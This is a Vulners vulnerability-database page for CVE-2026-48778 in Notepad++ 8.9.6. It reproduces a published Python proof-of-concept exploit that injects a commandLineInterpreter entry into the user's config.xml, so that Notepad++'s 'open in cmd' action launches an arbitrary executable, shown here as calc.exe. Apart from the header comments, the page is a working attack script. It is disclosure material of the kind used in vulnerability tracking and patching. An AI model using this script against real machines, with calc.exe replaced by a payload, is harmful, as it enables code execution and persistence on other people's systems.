Vulners
Lucene search
Notepad++ 8.9.6 - Arbitrary Code Execution
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Notepad-8.9.6-PoC | 28 May 202622:25 | – | githubexploit |
| Exploit for CVE-2026-48778 | 30 May 202617:49 | – | githubexploit |
 | CVE-2026-48770 | 28 May 202612:51 | – | circl |
| CVE-2026-48778 | 28 May 202612:51 | – | circl |
| CVE-2026-48800 | 28 May 202612:51 | – | circl |
 | Notepad++ security vulnerabilities | 30 May 202600:00 | – | cnnvd |
 | CVE-2026-48778 | 28 May 202612:51 | – | cve |
 | Notepad++ < 8.9.6.1 Multiple Vulnerabilities | 4 Jun 202600:00 | – | nessus |
 | 📄 Notepad++ 8.9.6 Arbitrary Code Execution | 1 Jun 202600:00 | – | packetstorm |
 | PT-2026-44400 | 26 May 202600:00 | – | ptsecurity |
10
# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution
# Date: 2026-05-30
# Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48778
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9
#
# Description:
# Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without
# validation and passes it to ShellExecute when "Open Containing Folder in cmd" is
# triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an
# arbitrary executable path, resulting in code execution under the current user context.
# In the following script, `calc.exe` has been used to demonstrate this vulnerability.
import os, sys
appdata = os.environ["APPDATA"]
if not appdata:
print("[!] APPDATA environment variable not found, exiting..")
sys.exit()
config_path = os.path.join(appdata, "Notepad++", "config.xml")
existing = os.path.exists(config_path)
if existing==True:
print("[+] Found config.xml at ", config_path)
else:
print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")
x = open(config_path, 'r')
s = x.readlines()
payload='<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n'
injected=False
for num,i in enumerate(s, start=0):
if '<GUIConfig name="commandLineInterpreter">' in i:
print("[!] Injecting payload..")
s[num]=payload
injected=True
break
elif "</GUIConfigs>" in i:
print("[!] Injecting payload..")
s.insert(num, payload)
injected=True
break
if not injected:
print("[!] Payload injection failed.")
sys.exit(1)
y = open(config_path, 'w')
y.writelines(s)
print("[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
print("[+] Calc.exe will launch instead of cmd.")
print("end")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
EPSS0.0002